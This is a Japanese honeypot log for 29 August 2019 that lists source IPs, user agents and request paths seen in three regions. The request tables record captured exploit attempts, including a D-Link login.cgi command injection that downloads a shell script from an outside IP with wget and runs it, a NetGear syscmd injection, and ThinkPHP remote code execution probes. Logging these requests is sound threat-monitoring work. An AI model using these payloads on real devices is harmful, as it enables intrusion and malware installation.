ハニーポット(仮) 観測記録 2019/08/29分です。
特徴
Region:AP
ThinkPHPの脆弱性を狙うアクセス
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。
Region:US
ThinkPHPの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
他
アクセス数推移
AP:総アクセス数:33 (前日比:-24)
US:総アクセス数:42 (前日比:+27)
EU:総アクセス数:12 (前日比:-33)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 103.21.141.44 | China |
4 | 106.39.78.4 | China |
1 | 118.25.42.134 | China |
2 | 130.211.254.102 | United States |
1 | 172.104.242.173 | United States |
3 | 211.38.144.230 | South Korea |
4 | 212.64.35.136 | China |
7 | 60.12.172.21 | China |
6 | 77.247.110.69 | Estonia |
1 | 87.27.82.13 | Italy |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
3 | Go-http-client/1.1 |
1 | Hakai/2.0 |
1 | Mozilla/5.0 |
3 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | python-requests/2.22.0 |
6 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | HTTP/1.1 | |
1 | GET | /index.action | HTTP/1.1 |
1 | GET | /login.action | HTTP/1.1 |
1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://54[.]37[.]74[.]232/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
3 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
3 | GET | /TP/index.php | HTTP/1.1 |
3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
3 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
4 | HEAD | /robots.txt | HTTP/1.1 |
3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 172.104.242.173 | United States |
10 | 180.153.184.54 | China |
1 | 196.70.250.24 | Morocco |
1 | 211.215.249.186 | South Korea |
1 | 211.38.144.230 | South Korea |
27 | 76.101.73.104 | United States |
1 | 77.247.110.69 | Estonia |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
27 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /database/index.php?lang=en | HTTP/1.1 |
1 | GET | /dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /db/index.php?lang=en | HTTP/1.1 |
1 | GET | /db/phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /myadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /MyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
1 | GET | /pma/index.php?lang=en | HTTP/1.1 |
1 | GET | /PMA/index.php?lang=en | HTTP/1.1 |
1 | GET | /program/index.php?lang=en | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /shopdb/index.php?lang=en | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
10 | 122.114.70.90 | China |
1 | 172.104.242.173 | United States |
1 | 77.247.110.69 | Estonia |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | /robots.txt | HTTP/1.0 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |